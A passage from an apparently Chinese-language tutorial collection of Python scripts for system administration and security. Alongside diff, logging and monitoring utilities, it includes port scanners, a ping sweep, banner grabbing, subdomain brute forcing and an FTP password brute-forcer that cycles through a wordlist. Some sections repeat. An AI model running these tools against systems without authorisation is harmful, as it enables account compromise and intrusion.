        print("讀取文件出錯了.{}".format(str(error)))
        return []
def DiffFile(file1, file2, output="./diff.html"):
    """Write an HTML side-by-side diff of two text files.

    Args:
        file1: Path of the old version.
        file2: Path of the new version.
        output: Path of the HTML report to create.
    """
    # Treat an unreadable file as empty rather than passing None to difflib.
    text1 = ReadFile(file1) or []
    text2 = ReadFile(file2) or []
    html = difflib.HtmlDiff().make_file(text1, text2)
    with open(output, "w", encoding="utf-8") as fp:
        fp.write(html)


if __name__ == "__main__":
    DiffFile("C://old.txt", "C://new.txt")
手工實現遍歷目錄下文件 通過手動編程實現對指定目錄中文件的遍歷.
import os
def list_all_files(rootdir):
    """Return the paths of all regular files below ``rootdir``, recursively.

    Args:
        rootdir: Directory to walk.

    Returns:
        List of file paths, each built with ``os.path.join`` from ``rootdir``.
    """
    _files = []
    for name in os.listdir(rootdir):
        path = os.path.join(rootdir, name)
        if os.path.isdir(path):
            _files.extend(list_all_files(path))
        elif os.path.isfile(path):
            _files.append(path)
    return _files


if __name__ == "__main__":
    # Use a name that does not hide the built-in ``list``.
    found = list_all_files("D:/sqlite")
    print(found)
通過簡單拼接實現遍歷文件 此處也可以使用一個簡單的方法實現遍歷文件與目錄.
import os
# Walk bottom-up and print every file, then every directory, of each folder.
for root, dirs, files in os.walk(os.getcwd(), topdown=False):
    for name in files:
        print(os.path.join(root, name))
    for name in dirs:
        print(os.path.join(root, name))
import os
# Walk bottom-up and print directories only.
for root, dirs, files in os.walk(os.getcwd(), topdown=False):
    for name in dirs:
        print(os.path.join(root, name))
import os
# Walk top-down and print files only.
for root, dirs, files in os.walk(os.getcwd()):
    for file in files:
        print(os.path.join(root, file))
拼接文件路徑遍歷指定類型的文件
import os
def spider(script_path, script_type):
    """Collect files below ``script_path`` whose path ends with ``script_type``.

    Args:
        script_path: Directory to search recursively.
        script_type: Required path suffix, for example ``"php"``.

    Returns:
        List of matching paths with backslashes replaced by ``/``.
    """
    final_files = []
    for root, dirs, files in os.walk(script_path, topdown=False):
        for fi in files:
            dfile = os.path.join(root, fi)
            if dfile.endswith(script_type):
                final_files.append(dfile.replace("\\", "/"))
    print("[+] 共找到了 {} 個PHP文件".format(len(final_files)))
    return final_files


if __name__ == "__main__":
    PagePath = spider("D://phpstudy/WWW/xhcms", "php")
    print(PagePath)
簡單實現釘釘報警
import requests
import sys
import json
# Robot webhook address; the access token is part of the URL.
dingding_url = 'https://oapi.dingtalk.com/robot/send?access_token=6d11af32'
data = {"msgtype": "markdown", "markdown": {"title": "監控", "text": "apche異常"}}
headers = {'Content-Type': 'application/json;charset=UTF-8'}
send_data = json.dumps(data).encode('utf-8')
# requests waits indefinitely by default; bound the call so a stalled
# endpoint cannot hang the alert script.
requests.post(url=dingding_url, data=send_data, headers=headers, timeout=5)
生成隨機驗證碼
import sys
import random
def generate_code(length=6):
    """Return a random verification code of digits and upper-case letters.

    Each position is a digit with probability 2/5 and a letter otherwise.

    Args:
        length: Number of characters to generate.
    """
    # SystemRandom draws from the OS entropy source, which suits codes that
    # guard a login better than the default generator.
    rng = random.SystemRandom()
    chars = []
    for _ in range(length):
        if rng.randrange(0, 5) in (2, 4):
            # The upper bound is exclusive: 10 is needed for 9 to occur.
            chars.append(str(rng.randrange(0, 10)))
        else:
            chars.append(chr(rng.randrange(65, 91)))
    return "".join(chars)


result = generate_code()
print(result)
生成XLS報表
import os
import xlwt
import time
def XLSWrite():
    """Write a ten-row sample workbook to ``<timestamp>.xls``.

    Returns:
        The name of the file that was saved.
    """
    workbook = xlwt.Workbook(encoding="utf-8")
    sheet = workbook.add_sheet("這里是主標題")
    # Header row.
    sheet.write(0, 0, "編號")
    sheet.write(0, 1, "內容")
    for i in range(0, 10):
        sheet.write(i + 1, 0, i)
        sheet.write(i + 1, 1, i)
    filename = "{}.xls".format(time.time())
    workbook.save(filename)
    if os.path.exists(filename):
        print("保存完成")
    return filename


if __name__ == "__main__":
    XLSWrite()
psutil取系統相關數據
import psutil
# CPU
cpu = psutil.cpu_times()
print("用戶時間比:{}".format(cpu.user))
print("CPU空閑百分比:{}".format(cpu.idle))
print("CPU邏輯個數:{}".format(psutil.cpu_count()))
# logical=False asks for physical cores; logical=True repeated the line above.
print("CPU物理個數:{}".format(psutil.cpu_count(logical=False)))
print("-" * 50)
# Memory
mem = psutil.virtual_memory()
print("系統總內存:{}".format(mem.total))
print("已使用內存:{}".format(mem.used))
print("空閑的內存:{}".format(mem.free))
print("交換內存已使用:{}".format(psutil.swap_memory().used))
print("-" * 50)
# Disks
print("全部分區數據:{}".format(psutil.disk_partitions()))
print("指定掛載點/數據:{}".format(psutil.disk_usage("/")))
print("磁盤總IO數:{}".format(psutil.disk_io_counters()))
print("取單個分區IO個數:{}".format(psutil.disk_io_counters(perdisk=True)))
print("-" * 50)
# Network
print("獲取網絡IO信息:{}".format(psutil.net_io_counters()))
print("輸出每個網絡接口的IO信息:{}".format(psutil.net_io_counters(pernic=True)))
print("-" * 50)
# Processes
print("系統進程列表:{}".format(psutil.pids()))
process = psutil.Process(0)  # inspect the process with PID 0
print("進程名稱:{}".format(process.name()))
print("進程線程數:{}".format(process.num_threads()))
print("進程工作狀態:{}".format(process.status()))
# print("進程UID:{} GID:{}".format(process.uids,process.gids))
print("取進程利用率:{}".format(process.memory_percent()))
print("進程Socket:{}".format(process.connections()))
實現簡單HTTP服務 對於Web應用,本質上就是socket服務端,用戶的瀏覽器其實就是socket客戶端,其下面就是簡單實現的HTTP服務器.
import socket
def handle_request(client):
    """Read one request from ``client`` and answer with a fixed HTML body.

    Args:
        client: Connected socket. The request bytes are read and ignored.
    """
    client.recv(1024)
    # sendall() keeps writing until everything is sent; send() may stop early.
    client.sendall(bytes("HTTP/1.1 200 OK\r\n\r\n", "UTF-8") + bytes("<b>Hello lyshark</b>", "UTF-8"))
def main(host="localhost", port=80):
    """Serve the fixed page forever, one connection at a time.

    Args:
        host: Interface to bind to.
        port: TCP port to listen on.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        # Allow quick restarts while old connections linger in TIME_WAIT.
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind((host, port))
        sock.listen(5)
        while True:
            connection, address = sock.accept()
            try:
                handle_request(connection)
            except OSError:
                # A client that disconnects early must not stop the server.
                pass
            finally:
                connection.close()


if __name__ == "__main__":
    main()
簡單實現密碼登錄驗證: 在不使用數據庫的情況下完成密碼驗證,密碼的hash值對應的是123123
import os,time
import hashlib
# In-memory user table: "pass" holds the MD5 hex digest of the password
# and "Flag" the number of consecutive failed logins, stored as a string.
# NOTE(review): unsalted MD5 is not suitable for real password storage.
db = [
    {"user": "admin", "pass": "4297f44b13955235245b2497399d7a93", "Flag": "0"},
    {"user": "guest", "pass": "4297f44b13955235245b2497399d7a93", "Flag": "0"},
    {"user": "lyshark", "pass": "4297f44b13955235245b2497399d7a93", "Flag": "0"}
]


def CheckUser(username, password):
    """Verify a login against ``db`` and track failed attempts.

    Args:
        username: Account name to look up.
        password: Clear-text password to verify.

    Returns:
        1 when the password matches; 0 when it does not, the user is
        unknown, or the account already has five failed attempts.
    """
    digest = hashlib.md5(bytes(password, encoding="utf-8")).hexdigest()
    for record in db:
        if record.get("user") != username:
            continue
        # Compare as numbers; the counter is kept as a string in the table.
        if int(record.get("Flag")) >= 5:
            print("用戶 {} 被永久限制登錄".format(record.get("user")))
            return 0
        if record.get("pass") == digest:
            # Reset with a string: storing int 0 made the next check raise
            # TypeError when it was compared with "5".
            record["Flag"] = "0"
            return 1
        record["Flag"] = str(int(record["Flag"]) + 1)
        return 0
    return 0


if __name__ == "__main__":
    while True:
        username = input("輸入用戶名: ")
        password = input("輸入密碼: ")
        ret = CheckUser(username, password)
        print("登錄狀態:", ret)
針對Web服務的流量統計: 統計Web服務器日志文件中的流量計數,例如192.168.1.10總訪問流量.
import os,sys
def Count_IP_And_Flow(file):
    """Count requests and sum response sizes per client IP in an access log.

    Field 0 of each whitespace-split line is taken as the client address
    and field 9 as the response size. Lines that are too short or whose
    size is not a number (for example ``-``) are skipped.

    Args:
        file: Path of the access log.

    Returns:
        Tuple ``(addr, flow)``: ``addr`` maps IP to request count and
        ``flow`` maps IP to total bytes.
    """
    addr = {}
    flow = {}
    with open(file) as f:
        for line in f:
            fields = line.split()
            if len(fields) < 10 or not fields[9].isdigit():
                continue
            ip_attr, size = fields[0], int(fields[9])
            addr[ip_attr] = addr.get(ip_attr, 0) + 1
            flow[ip_attr] = flow.get(ip_attr, 0) + size
    return addr, flow


if __name__ == "__main__":
    Address, OutFlow = Count_IP_And_Flow("c://access.log")
    print("地址計數:{} ---> 流量計數:{}".format(Address, OutFlow))
針對Web服務的狀態碼統計: 統計Web服務日志中各狀態碼出現的次數,例如404出現的頻率等.
import os,sys
def Count_Flag_And_Flow(file):
    """Count how often each HTTP status code appears in an access log.

    Field 8 of each whitespace-split line is taken as the status code;
    lines with fewer fields are skipped.

    Args:
        file: Path of the access log.

    Returns:
        Dict mapping status code (as text) to its count; each pair is
        also printed.
    """
    from collections import Counter

    counts = Counter()
    with open(file) as f:
        for line in f:
            fields = line.split()
            if len(fields) > 8:
                counts[fields[8]] += 1
    flag = dict(counts)
    for item, num in flag.items():
        print("狀態碼:{} --> 計數:{}".format(item, num))
    return flag


if __name__ == "__main__":
    Address = Count_Flag_And_Flow("c://access.log")
    print("地址計數:{} ".format(Address))
計算出指定網段主機IP:
import os
def CalculationIP(Addr_Count):
    """Expand a range such as ``192.168.1.10-200`` into single addresses.

    Args:
        Addr_Count: Start address and last final octet, joined by ``-``.

    Returns:
        List of dotted-quad strings from start to end inclusive, or ``0``
        when the input cannot be parsed.
    """
    try:
        parts = Addr_Count.split("-")
        octets = parts[0].split(".")
        prefix = octets[0] + "." + octets[1] + "." + octets[2] + "."
        first = int(octets[3])
        last = int(parts[1])
    except (AttributeError, IndexError, ValueError):
        return 0
    return [prefix + str(item) for item in range(first, last + 1)]


if __name__ == "__main__":
    ret = CalculationIP("192.168.1.10-200")
    # The function returns 0 on bad input, which has no length.
    for item in ret or []:
        print("地址范圍內的所有IP: {}".format(item))
PHP函數掃描工具: 快速掃描PHP文件中的危險函數,可用於挖掘漏洞與一句話掃描.
# coding=gbk
import sys,os,re
def spider(script_path, script_type):
    """Collect files below ``script_path`` whose path ends with ``script_type``.

    Args:
        script_path: Directory to search recursively.
        script_type: Required path suffix, for example ``".php"``.

    Returns:
        List of matching paths with backslashes replaced by ``/``.
    """
    final_files = []
    for root, dirs, files in os.walk(script_path, topdown=False):
        for fi in files:
            dfile = os.path.join(root, fi)
            if dfile.endswith(script_type):
                final_files.append(dfile.replace("\\", "/"))
    print("[+] 共找到了 {} 個PHP文件".format(len(final_files)))
    return final_files
def scanner(files_list, func):
    """Search files line by line for a regular expression.

    Args:
        files_list: Paths of the files to scan.
        func: Regular expression to look for, e.g. a function name.

    Returns:
        List of ``(matches, line_number, path)`` tuples, one per matching
        line; every hit is also printed.
    """
    pattern = re.compile(func)
    hits = []
    for item in files_list:
        # Undecodable bytes are replaced so one odd file cannot stop the scan.
        with open(item, "r", encoding="utf-8", errors="replace") as fp:
            # enumerate() gives the real line number; list.index() returned
            # the first occurrence whenever a line was repeated.
            for Code_line, line in enumerate(fp, start=1):
                flag = pattern.findall(line.strip("\n"))
                if len(flag) != 0:
                    print("函數: {} ---> 函數所在行: {} ---> 路徑: {} ".format(flag, Code_line, item))
                    hits.append((flag, Code_line, item))
    return hits


if __name__ == "__main__":
    if len(sys.argv) < 3:
        raise SystemExit("usage: {} <path> <pattern>".format(sys.argv[0]))
    path = sys.argv[1]
    func = sys.argv[2]
    ret = spider(path, ".php")
    scanner(ret, func)
SQL執行語句監控: 通過日志文件,監控MySQL數據庫執行的SQL語句,需要開啟數據庫SET GLOBAL general_log='ON'; set global general_log_file='C:\mysql.log' 這兩個選項才能夠實現監控數據的目的.
import re
def monitor_sql(log_path="C:/mysql.log"):
    """Print the statements recorded in a MySQL general log, then empty it.

    Each line is split on tabs; field 1 is shown as the state and field 2
    as the statement. Lines whose state contains ``Connect``, whose
    statement is empty, or that have fewer than three fields are skipped.

    Args:
        log_path: Path of the general log file.

    Returns:
        List of ``(state, statement)`` tuples that were printed.

    Raises:
        SystemExit: If the log could not be read (it is still emptied).
    """
    statements = []
    failed = False
    try:
        with open(log_path, "r") as fp:
            for item in fp:
                temp = item.replace("\n", "").split('\t')
                if len(temp) < 3:
                    # Continuation or header line; indexing it used to abort the run.
                    continue
                if re.search("Connect", temp[1]) is None and temp[2] != "":
                    print("狀態:{} ---> 執行語句: {}".format(temp[1], temp[2]))
                    statements.append((temp[1], temp[2]))
    except OSError:
        failed = True
    # Truncate the log so the next run only sees new statements.
    with open(log_path, "w"):
        pass
    if failed:
        raise SystemExit()
    return statements


if __name__ == "__main__":
    monitor_sql()
簡單實現端口掃描
import socket
def scan_hosts(port=443, timeout=1):
    """Probe one TCP port on every host of 192.168.1.1 - 192.168.1.254.

    Args:
        port: TCP port to test.
        timeout: Seconds to wait for each connection attempt.
    """
    for ip in range(1, 255):
        # A socket cannot be reused once connect() has succeeded or failed,
        # so each host gets its own.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sk:
            sk.settimeout(timeout)
            try:
                sk.connect(("192.168.1." + str(ip), port))
                print("192.168.1.%d server open \n" % ip)
            except OSError:
                print("192.168.1.%d server not open" % ip)


if __name__ == "__main__":
    scan_hosts()
第二種簡單的實現端口掃描.
import socket
def PortScan(ip, port, timeout=1.0):
    """Try a TCP connection and report whether ``port`` on ``ip`` accepts it.

    Args:
        ip: Target host.
        port: TCP port number.
        timeout: Seconds to wait, so an unanswered attempt cannot block
            for the operating system's much longer default.

    Returns:
        True when the connection succeeded, otherwise False.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.settimeout(timeout)
    try:
        server.connect((ip, port))
    except OSError:
        print('{0} port {1} is not open'.format(ip, port))
        return False
    else:
        print('{0} port {1} is open'.format(ip, port))
        return True
    finally:
        server.close()


if __name__ == '__main__':
    host = '192.168.1.1'
    for port in range(50, 1000):
        PortScan(host, port)
import socket
port_number = [135, 443, 80]
for index in port_number:
    # The with-block closes each socket; previously only one was closed.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(1)
        # connect_ex() returns 0 on success instead of raising.
        result = sock.connect_ex(('127.0.0.1', index))
    if result == 0:
        print("Port %d is open" % index)
    else:
        print("Port %d is not open" % index)
當然上面這幾種方式都是串行執行的,這在多IP多端口的情況下是非常慢的,所以引入多線程threading模塊
import threading
import socket
def PortScan(ip, port, timeout=1.0):
    """Try a TCP connection and report whether ``port`` on ``ip`` accepts it.

    Args:
        ip: Target host.
        port: TCP port number.
        timeout: Seconds to wait, so an unanswered attempt cannot block
            for the operating system's much longer default.

    Returns:
        True when the connection succeeded, otherwise False.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.settimeout(timeout)
    try:
        server.connect((ip, port))
    except OSError:
        print('{0} port {1} is not open'.format(ip, port))
        return False
    else:
        print('{0} port {1} is open'.format(ip, port))
        return True
    finally:
        server.close()


if __name__ == '__main__':
    host = '192.168.1.1'
    # One thread per port: start them all, then wait for all of them.
    threads = [threading.Thread(target=PortScan, args=(host, port)) for port in range(20, 100)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
簡單實現批量Ping
import multiprocessing
import sys,subprocess
def ping(ip):
    """Ping one host once and print its round-trip time.

    Args:
        ip: Host name or address; surrounding whitespace (such as the
            newline of a line read from a file) is removed. Blank input
            is ignored.
    """
    ip = ip.strip()
    if not ip:
        return
    if sys.platform.startswith("win"):
        command = ["ping", "-w", "500", "-n", "1", ip]
    else:
        command = ["ping", "-W", "1", "-c", "1", ip]
    # An argument list with no shell keeps the host out of shell parsing,
    # and one run now provides both the status and the output.
    proc = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
                          universal_newlines=True, errors="replace")
    delay = "None"
    if proc.returncode == 0:
        for marker in ("平均 = ", "Average = ", "time="):
            if marker in proc.stdout:
                delay = (proc.stdout.split(marker)[1].split() or ["None"])[0]
                break
    print("延時: {} 主機: {}".format(delay, ip))


if __name__ == "__main__":
    with open("ip.log", "r") as f:
        workers = [multiprocessing.Process(target=ping, args=(i,)) for i in f]
    for p in workers:
        p.start()
    for p in workers:
        p.join()
獲取目標網頁容器信息
import os
import requests
import re
head = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}


def GetTitle(domain):
    """Fetch ``https://<domain>`` and print its title and selected headers.

    A header that the server did not send is printed as ``None`` instead
    of silently ending the report.

    Args:
        domain: Host name to query.
    """
    url = "https://{}".format(domain)
    try:
        ret = requests.get(url=url, headers=head, timeout=1)
    except requests.RequestException as error:
        print("[-] {} -> {}".format(url, error))
        return
    # Non-greedy so that only the first <title> element is captured.
    title = re.findall("<title>(.*?)</title>", ret.content.decode("utf-8", "replace"))
    print("頁面標題:{}".format(title[0] if title else None))
    print("主機時間:{}".format(ret.headers.get("Date")))
    print("主機容器:{}".format(ret.headers.get("Server")))
    print("壓縮技術:{}".format(ret.headers.get("Content-Encoding")))
    print("Cxy_all:{}".format(ret.headers.get("Cxy_all")))
    print("Traceid:{}".format(ret.headers.get("Traceid")))


if __name__ == "__main__":
    GetTitle("baidu.cn")
獲取目標網站IP地址
import os
import socket
import re
def GetIPAddress(domain):
    """Resolve ``domain`` to an IPv4 address and print it.

    Args:
        domain: Host name, or an IPv4 address in text form.

    Returns:
        The first IPv4 address returned by the resolver, or ``None`` when
        the name cannot be resolved.
    """
    try:
        # Request IPv4 only; an IPv6-first answer used to print nothing.
        sock = socket.getaddrinfo(domain, None, socket.AF_INET)
    except (socket.gaierror, UnicodeError):
        return None
    ip = sock[0][4][0]
    print(ip)
    return ip


if __name__ == "__main__":
    GetIPAddress("www.163.com")
子域名爆破: 用於爆破網站中的一級域名,例如www等格式的域名.
import os
import requests
import linecache
import re
head = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}


def VisitWeb(prefix, domain):
    """Check whether ``https://<prefix>.<domain>`` answers with HTTP 200.

    Args:
        prefix: Sub-domain label to try.
        domain: Parent domain.

    Returns:
        1 when the request succeeded with status 200, otherwise 0.
    """
    url = "https://{}.{}".format(prefix, domain)
    try:
        ret = requests.get(url=url, headers=head, timeout=1)
    except requests.RequestException:
        return 0
    return 1 if ret.status_code == 200 else 0
def BlastWeb(domain, wordlist):
    """Try every prefix from ``wordlist`` as a sub-domain of ``domain``.

    Args:
        domain: Parent domain.
        wordlist: Path of a text file with one prefix per line; only the
            first whitespace-separated word of a line is used and blank
            lines are skipped.

    Returns:
        List of prefixes for which ``VisitWeb`` reported success; each is
        also printed.
    """
    found = []
    with open(wordlist, "r") as fp:
        for line in fp:
            fields = line.split()
            if not fields:
                # A blank line used to raise IndexError.
                continue
            prefix = fields[0]
            if VisitWeb(prefix, domain) != 0:
                print("旁站: {}.{} 存在".format(prefix, domain))
                found.append(prefix)
    return found


if __name__ == "__main__":
    BlastWeb("baidu.com", "./list.log")
FTP密碼爆破工具 可自行加上多線程支持,提高速度..
import ftplib
def Brutelogin(hostname, username, wordlist):
    """Try the passwords from ``wordlist`` against an FTP account.

    Args:
        hostname: FTP server to connect to.
        username: Account name.
        wordlist: Path of a text file with one password per line.

    Returns:
        ``(username, password)`` for the first password that logs in, or
        ``(None, None)`` when none does.
    """
    with open(wordlist, "r") as fp:
        for line in fp:
            password = line.rstrip("\r\n")
            print("[+] Host:{} User:{} Paswd:{}".format(hostname, username, password))
            try:
                ftp = ftplib.FTP(hostname, timeout=5)
                try:
                    ftp.login(username, password)
                finally:
                    ftp.close()
            except ftplib.all_errors:
                continue
            print("\n[*] {} Login Succeeded.".format(password))
            # Stop at the first hit; the old loop kept going and then
            # reported failure regardless.
            return (username, password)
    print("\n[-] Could not brubrute force FTP credentials.")
    return (None, None)


if __name__ == "__main__":
    Brutelogin("192.168.1.20", "admin", "./list.log")
簡單實現百度爬取
import sys,os,re
import requests
from bs4 import BeautifulSoup
head = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36"}
#url = "https://www.baidu.com/s?wd=lyshark&pn=0"
url = "http://192.168.1.2/bd/"
ret = requests.get(url=url, headers=head, timeout=5)
soup = BeautifulSoup(ret.content, 'lxml')
# Anchors that have a non-empty data-click attribute and no class attribute.
urls = soup.find_all(name='a', attrs={'data-click': re.compile(('.')), 'class': None})
for item in urls:
    try:
        get_url = requests.get(url=item['href'], headers=head, timeout=5)
    except (KeyError, requests.RequestException):
        # Skip anchors without href and links that fail to load.
        continue
    if get_url.status_code == 200:
        print(get_url.url)
實現動態進度條
import time,ctypes
def process_bar(percent, end_str=''):
    """Redraw a one-line progress indicator in place.

    Args:
        percent: Current progress as an integer.
        end_str: Text shown after the separator, e.g. the total.

    Returns:
        The string that was written (it starts with a carriage return).
    """
    bar = '\r' + '[ {:0>0d} | '.format(percent) + end_str + " ]"
    print(bar, end='', flush=True)
    return bar


if __name__ == "__main__":
    for i in range(101):
        time.sleep(0.1)
        end_str = '100'
        process_bar(i, end_str=end_str)
獲取目標網頁容器信息
import os
import requests
import re
# Request headers sent with the page fetch (desktop-browser User-Agent).
head={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}


def GetTitle(domain):
    """Fetch https://<domain> and print its title and selected response headers.

    Args:
        domain: Host name to request over HTTPS.

    Returns:
        None. A header the server did not send is printed as ``None``; the
        original stopped silently at the first missing header.
    """
    url="https://{}".format(domain)
    try:
        ret = requests.get(url=url,headers=head,timeout=1)
    except Exception as err:
        # Report the failure instead of hiding it behind ``except: pass``.
        print("[-] {} : {}".format(url, err))
        return
    # Non-greedy, case-insensitive and newline-tolerant title match.
    found = re.search(r"<title>(.*?)</title>", ret.content.decode("utf-8", "ignore"), re.S | re.I)
    print("頁面標題:{}".format(found.group(1) if found else None))
    print("主機時間:{}".format(ret.headers.get("Date")))
    print("主機容器:{}".format(ret.headers.get("Server")))
    print("壓縮技術:{}".format(ret.headers.get("Content-Encoding")))
    print("Cxy_all:{}".format(ret.headers.get("Cxy_all")))
    print("Traceid:{}".format(ret.headers.get("Traceid")))
# Sample lookup, executed only when the file is started as a script.
if __name__ == "__main__":
    GetTitle(domain="baidu.cn")
獲取目標網站IP地址
import os
import socket
import re
def GetIPAddress(domain):
    """Resolve *domain* and print its first IPv4 address.

    Args:
        domain: Host name (or dotted IPv4 literal) to resolve.

    Returns:
        None. Nothing is printed when the name cannot be resolved.
    """
    try:
        # Request IPv4 records only; the original took whatever came first
        # and then searched its string form for a dotted quad.
        records = socket.getaddrinfo(domain, None, socket.AF_INET)
    except (OSError, UnicodeError):
        # Resolution failed or the name is not a valid host label.
        return
    if records:
        # Each record is (family, type, proto, canonname, sockaddr);
        # sockaddr[0] is the address string.
        print(records[0][4][0])
# Sample lookup, executed only when the file is started as a script.
if __name__ == "__main__":
    GetIPAddress(domain="www.163.com")
FTP密碼爆破工具 可自行加上多線程支持,提高速度..
import ftplib
def Brutelogin(hostname,username,wordlist,timeout=5):
    """Try each password in *wordlist* for *username* on an FTP server.

    Args:
        hostname: FTP server to connect to.
        username: Account name used for every attempt.
        wordlist: Path of a text file with one candidate password per line.
        timeout: Seconds to wait for the connection (new, defaults to 5).

    Returns:
        (username, password) for the first accepted password, or
        (None, None) when no candidate is accepted. The original always
        reached the failure message and returned (None, None).
    """
    with open(wordlist, "r") as fp:
        for line in fp:
            password = line.rstrip("\r\n")
            print("[+] Host:{} User:{} Paswd:{}".format(hostname,username,password))
            ftp = None
            try:
                ftp = ftplib.FTP(hostname, timeout=timeout)
                ftp.login(username,password)
            except ftplib.all_errors:
                # Refused login or connection problem: go on with the next line.
                continue
            finally:
                # Every attempt opens its own connection; release it again.
                if ftp is not None:
                    ftp.close()
            print("\n[*] {} Login Succeeded.".format(password))
            return (username, password)
    print("\n[-] Could not brubrute force FTP credentials.")
    return(None,None)
# Example invocation; the returned tuple is not used.
Brutelogin(hostname="192.168.1.20", username="admin", wordlist="./list.log")
簡單實現批量Ping
import multiprocessing
import sys,subprocess
def ping(ip):
    """Ping *ip* and print its average latency, or "None" when it does not answer.

    The ``-n``/``-w`` options and the "平均 = " marker match the ``ping``
    command of a Chinese-language Windows system.

    Args:
        ip: Address or host name; surrounding whitespace (such as the newline
            left over from reading a file) is removed first.
    """
    ip = str(ip).strip()
    try:
        # Argument list instead of a shell string, so the address text is
        # never interpreted by a shell.
        ret = subprocess.call(["ping", "-w", "500", "-n", "1", ip], stdout=subprocess.DEVNULL)
    except OSError:
        # The ping executable could not be started.
        ret = 1
    if ret != 0:
        print("延時: {} 主機: {}".format("None", ip))
        return
    hproc = subprocess.run(["ping", ip], stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                           universal_newlines=True).stdout
    marker = "平均 = "
    # On another locale the marker is missing; the original raised IndexError.
    delay = hproc.split(marker)[1].strip() if marker in hproc else "None"
    print("延時: {} 主機: {}".format(delay,ip))
if __name__ == "__main__":
    with open("ip.log","r") as f:
        # Drop line endings and skip empty lines; the original passed every
        # raw line, newline included, to ping().
        targets = [line.strip() for line in f if line.strip()]
    workers = []
    for i in targets:
        p = multiprocessing.Process(target=ping,args=(i,))
        p.start()
        workers.append(p)
    # Wait for every worker so the script ends only after all results are printed.
    for p in workers:
        p.join()
掃描目標主機 Banner: 為了讓函數獲得完整的屏幕控制權,這里使用一個信號量,它能夠阻止其他線程運行而避免出現多線程同時輸出造成的亂碼和失序等情況.
#coding=utf-8
from socket import *
from threading import *
# Semaphore with a single permit, used so that only one thread prints at a time.
screenLock = Semaphore(value=1)


def ScanBanner(addr,port):
    """Connect to addr:port, send a greeting and print whatever the peer answers.

    Args:
        addr: Target IPv4 address or host name.
        port: TCP port number.

    Prints a "[+]" line with the received bytes on success, or a "[-]" line
    when the connection or the exchange fails.
    """
    conn = None
    try:
        conn = socket(AF_INET,SOCK_STREAM)
        conn.connect((addr,port))
        conn.send(bytes("hello lyshark\r\n",encoding="utf-8"))
        res = conn.recv(200)
    except Exception:
        message = "[-] 主機: {} 不存在或已經關閉.".format(addr)
    else:
        message = "[+] 主機: {} Banner: {}".format(addr,res)
    finally:
        # conn stays None if socket() itself failed; the original referenced
        # it unconditionally.
        if conn is not None:
            conn.close()
    # Acquire exactly once per call. The original acquired in both the try
    # and the except path, which could block forever if an error occurred
    # after the first acquire.
    with screenLock:
        print(message)
# New sockets get a 1-second default timeout; then one thread per address
# 192.168.1.0 .. 192.168.1.24 probes port 80.
setdefaulttimeout(1)
for i in range(25):
    Thread(target=ScanBanner, args=("192.168.1.{}".format(i), 80)).start()
scapy實現ping
from scapy.all import *
from random import randint
import ipaddress,threading
def ping(host):
    """Send one ICMP packet with a random id to *host* and print the replying address.

    Waits up to 3 seconds for an answer; prints nothing when none arrives.
    """
    ident = randint(1,65534)
    # The same random number is used as IP id, ICMP id and ICMP sequence.
    ip_layer = IP(dst=host, ttl=64, id=ident)
    icmp_layer = ICMP(id=ident, seq=ident)
    respon = sr1(ip_layer / icmp_layer / b"lyshark", timeout=3)
    if not respon:
        return
    print(str(respon[IP].src))
if __name__=='__main__':
    net = ipaddress.ip_network("192.168.1.0/24")
    # ping() is called for each address in turn; the list holds its return values.
    threads = [ping(item) for item in net]
    print(threads)
web容器識別
import re,requests
from bs4 import BeautifulSoup
# Request headers sent with every fetch (desktop-browser User-Agent).
header = {'user-agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'}


def GetServerTitle(url):
    """Print Date, Server, X-Powered-By and the <title> tag of *url* on one line.

    Args:
        url: Full URL to request.

    Raises:
        Whatever requests.get() raises when the request itself fails.
    """
    Respon = requests.get(url=url,headers=header,timeout=5)
    print("--" * 50)
    print(url + " ",end="")
    if Respon.status_code == 200:
        for item in ["Date","Server","X-Powered-By"]:
            # Look the header up on the response mapping directly; the
            # original compared against a plain list of header names, which
            # is case-sensitive.
            value = Respon.headers.get(item)
            print(("None" if value is None else value) + " ",end="")
        page = BeautifulSoup(Respon.text,"html.parser")
        # find() gives None for a page without <title>; indexing
        # find_all(...)[0] raised IndexError in that case.
        print(page.find("title"))
    else:
        # End the line that was started with the URL.
        print()
    print("--" * 50)
# Query the placeholder address nine times in a row.
for _ in range(9):
    GetServerTitle(url="http://www.xxx.com")
多線程執行SSH的兩種方式
import paramiko,datetime,threading
class MyThread(threading.Thread):
    """Thread that runs one command on a host over SSH and keeps its output."""

    def __init__(self,address,username,password,port,command):
        super(MyThread, self).__init__()
        self.address = address
        self.username = username
        self.password = password
        self.port = port
        self.command = command
        # Stays None until run() has stored something.
        self.result = None

    def run(self):
        """Connect, execute the command and store its decoded output in self.result.

        stdout is preferred; stderr is used when stdout is empty. Any
        failure stores the string "0".
        """
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            ssh.connect(self.address, port=int(self.port), username=self.username, password=self.password, timeout=1)
            stdin, stdout, stderr = ssh.exec_command(self.command)
            result = stdout.read()
            if not result:
                # The original stored stderr and then immediately overwrote
                # it with the (empty) decoded stdout.
                result = stderr.read()
            self.result = result.decode()
        except Exception:
            self.result = "0"
        finally:
            # Close the client on failure too.
